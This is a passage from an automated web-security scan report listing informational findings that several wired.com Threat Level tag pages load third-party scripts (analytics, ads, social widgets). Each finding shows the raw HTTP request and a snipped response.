<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<!-- NextGeEN Gallery CoolIris/PicLens support -->
<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...
</div>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div class="textwidget"><script type="text/javascript" src="http://widgets.amung.us/classic.js"></script>
...[SNIP]...
<!-- END wiredGlobalfooter -->
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

6.144. http://www.wired.com/threatlevel/tag/censorship/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wired.com
Path:   /threatlevel/tag/censorship/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /threatlevel/tag/censorship/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
X-Pingback: http://www.wired.com/threatlevel/xmlrpc.php
Last-Modified: Wed, 12 Jan 2011 15:26:02 +0000
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=1
Expires: Wed, 12 Jan 2011 15:33:25 GMT
Date: Wed, 12 Jan 2011 15:33:24 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 127014

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<!-- NextGeEN Gallery CoolIris/PicLens support -->
<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...
<br />
<script src="http://digg.com/tools/diggthis.js" type="text/javascript"></script>
...[SNIP]...
</div>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div class="textwidget"><script type="text/javascript" src="http://widgets.amung.us/classic.js"></script>
...[SNIP]...
<!-- END wiredGlobalfooter -->
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

6.145. http://www.wired.com/threatlevel/tag/china/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wired.com
Path:   /threatlevel/tag/china/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /threatlevel/tag/china/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
X-Pingback: http://www.wired.com/threatlevel/xmlrpc.php
Last-Modified: Wed, 12 Jan 2011 15:26:03 +0000
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=2
Expires: Wed, 12 Jan 2011 15:33:29 GMT
Date: Wed, 12 Jan 2011 15:33:27 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 144002

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<!-- NextGeEN Gallery CoolIris/PicLens support -->
<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...
</div>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div class="textwidget"><script type="text/javascript" src="http://widgets.amung.us/classic.js"></script>
...[SNIP]...
<!-- END wiredGlobalfooter -->
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

6.146. http://www.wired.com/threatlevel/tag/copyright/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wired.com
Path:   /threatlevel/tag/copyright/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /threatlevel/tag/copyright/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
X-Pingback: http://www.wired.com/threatlevel/xmlrpc.php
Last-Modified: Wed, 12 Jan 2011 15:26:05 +0000
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=32
Expires: Wed, 12 Jan 2011 15:34:01 GMT
Date: Wed, 12 Jan 2011 15:33:29 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 115949

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<!-- NextGeEN Gallery CoolIris/PicLens support -->
<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...
</div>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div class="textwidget"><script type="text/javascript" src="http://widgets.amung.us/classic.js"></script>
...[SNIP]...
<!-- END wiredGlobalfooter -->
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

6.147. http://www.wired.com/threatlevel/tag/crime/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wired.com
Path:   /threatlevel/tag/crime/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /threatlevel/tag/crime/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
X-Pingback: http://www.wired.com/threatlevel/xmlrpc.php
Last-Modified: Wed, 12 Jan 2011 15:26:06 +0000
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=57
Expires: Wed, 12 Jan 2011 15:34:33 GMT
Date: Wed, 12 Jan 2011 15:33:36 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 127003

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<!-- NextGeEN Gallery CoolIris/PicLens support -->
<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...
<br />
<script src="http://digg.com/tools/diggthis.js" type="text/javascript"></script>
...[SNIP]...
<br />
<script src="http://digg.com/tools/diggthis.js" type="text/javascript"></script>
...[SNIP]...
</div>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div class="textwidget"><script type="text/javascript" src="http://widgets.amung.us/classic.js"></script>
...[SNIP]...
<!-- END wiredGlobalfooter -->
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

6.148. http://www.wired.com/threatlevel/tag/defcon/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wired.com
Path:   /threatlevel/tag/defcon/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /threatlevel/tag/defcon/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
X-Pingback: http://www.wired.com/threatlevel/xmlrpc.php
Last-Modified: Wed, 12 Jan 2011 15:26:07 +0000
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=29
Expires: Wed, 12 Jan 2011 15:34:10 GMT
Date: Wed, 12 Jan 2011 15:33:41 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 135616

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<!-- NextGeEN Gallery CoolIris/PicLens support -->
<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...
<br />
<script src="http://digg.com/tools/diggthis.js" type="text/javascript"></script>
...[SNIP]...
</div>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div class="textwidget"><script type="text/javascript" src="http://widgets.amung.us/classic.js"></script>
...[SNIP]...
<!-- END wiredGlobalfooter -->
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

6.149. http://www.wired.com/threatlevel/tag/dmca/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wired.com
Path:   /threatlevel/tag/dmca/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /threatlevel/tag/dmca/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
X-Pingback: http://www.wired.com/threatlevel/xmlrpc.php
Last-Modified: Wed, 12 Jan 2011 15:26:08 +0000
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=5
Expires: Wed, 12 Jan 2011 15:34:08 GMT
Date: Wed, 12 Jan 2011 15:34:03 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 115670

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<!-- NextGeEN Gallery CoolIris/PicLens support -->
<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...
</div>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div class="textwidget"><script type="text/javascript" src="http://widgets.amung.us/classic.js"></script>
...[SNIP]...
<!-- END wiredGlobalfooter -->
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

6.150. http://www.wired.com/threatlevel/tag/facebook/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wired.com
Path:   /threatlevel/tag/facebook/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /threatlevel/tag/facebook/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 12:35:59 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=61
Expires: Wed, 12 Jan 2011 15:35:05 GMT
Date: Wed, 12 Jan 2011 15:34:04 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 126359

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<!-- NextGeEN Gallery CoolIris/PicLens support -->
<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...
<br />
<script src="http://digg.com/tools/diggthis.js" type="text/javascript"></script>
...[SNIP]...
</div>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div class="textwidget"><script type="text/javascript" src="http://widgets.amung.us/classic.js"></script>
...[SNIP]...
<!-- END wiredGlobalfooter -->
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

6.151. http://www.wired.com/threatlevel/tag/fbi/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wired.com
Path:   /threatlevel/tag/fbi/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /threatlevel/tag/fbi/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
X-Pingback: http://www.wired.com/threatlevel/xmlrpc.php
Last-Modified: Wed, 12 Jan 2011 15:26:09 +0000
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=4
Expires: Wed, 12 Jan 2011 15:34:12 GMT
Date: Wed, 12 Jan 2011 15:34:08 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 119599

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<!-- NextGeEN Gallery CoolIris/PicLens support -->
<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...
</div>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div class="textwidget"><script type="text/javascript" src="http://widgets.amung.us/classic.js"></script>
...[SNIP]...
<!-- END wiredGlobalfooter -->
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

6.152. http://www.wired.com/threatlevel/tag/file-sharing/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wired.com
Path:   /threatlevel/tag/file-sharing/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /threatlevel/tag/file-sharing/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 12:54:43 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=475
Expires: Wed, 12 Jan 2011 15:42:07 GMT
Date: Wed, 12 Jan 2011 15:34:12 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 122902

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<!-- NextGeEN Gallery CoolIris/PicLens support -->
<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...
</div>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div class="textwidget"><script type="text/javascript" src="http://widgets.amung.us/classic.js"></script>
...[SNIP]...
<!-- END wiredGlobalfooter -->
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

6.153. http://www.wired.com/threatlevel/tag/first-amendment/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wired.com
Path:   /threatlevel/tag/first-amendment/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /threatlevel/tag/first-amendment/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
X-Pingback: http://www.wired.com/threatlevel/xmlrpc.php
Last-Modified: Wed, 12 Jan 2011 15:26:11 +0000
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=460
Expires: Wed, 12 Jan 2011 15:41:52 GMT
Date: Wed, 12 Jan 2011 15:34:12 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 112423

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<!-- NextGeEN Gallery CoolIris/PicLens support -->
<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...
</div>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div class="textwidget"><script type="text/javascript" src="http://widgets.amung.us/classic.js"></script>
...[SNIP]...
<!-- END wiredGlobalfooter -->
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

6.154. http://www.wired.com/threatlevel/tag/google/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wired.com
Path:   /threatlevel/tag/google/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /threatlevel/tag/google/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 12:33:32 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=480
Expires: Wed, 12 Jan 2011 15:42:15 GMT
Date: Wed, 12 Jan 2011 15:34:15 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 113727

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<!-- NextGeEN Gallery CoolIris/PicLens support -->
<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...
</div>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div class="textwidget"><script type="text/javascript" src="http://widgets.amung.us/classic.js"></script>
...[SNIP]...
<!-- END wiredGlobalfooter -->
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

6.155. http://www.wired.com/threatlevel/tag/hack/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wired.com
Path:   /threatlevel/tag/hack/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /threatlevel/tag/hack/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 12:09:14 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=480
Expires: Wed, 12 Jan 2011 15:42:18 GMT
Date: Wed, 12 Jan 2011 15:34:18 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 130699

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<!-- NextGeEN Gallery CoolIris/PicLens support -->
<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...
</div>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div class="textwidget"><script type="text/javascript" src="http://widgets.amung.us/classic.js"></script>
...[SNIP]...
<!-- END wiredGlobalfooter -->
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

6.156. http://www.wired.com/threatlevel/tag/hacking/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wired.com
Path:   /threatlevel/tag/hacking/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /threatlevel/tag/hacking/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
X-Pingback: http://www.wired.com/threatlevel/xmlrpc.php
Last-Modified: Wed, 12 Jan 2011 15:26:14 +0000
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=480
Expires: Wed, 12 Jan 2011 15:42:19 GMT
Date: Wed, 12 Jan 2011 15:34:19 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 117574

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<!-- NextGeEN Gallery CoolIris/PicLens support -->
<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...
<br />
<script src="http://digg.com/tools/diggthis.js" type="text/javascript"></script>
...[SNIP]...
<br />
<script src="http://digg.com/tools/diggthis.js" type="text/javascript"></script>
...[SNIP]...
</div>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div class="textwidget"><script type="text/javascript" src="http://widgets.amung.us/classic.js"></script>
...[SNIP]...
<!-- END wiredGlobalfooter -->
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

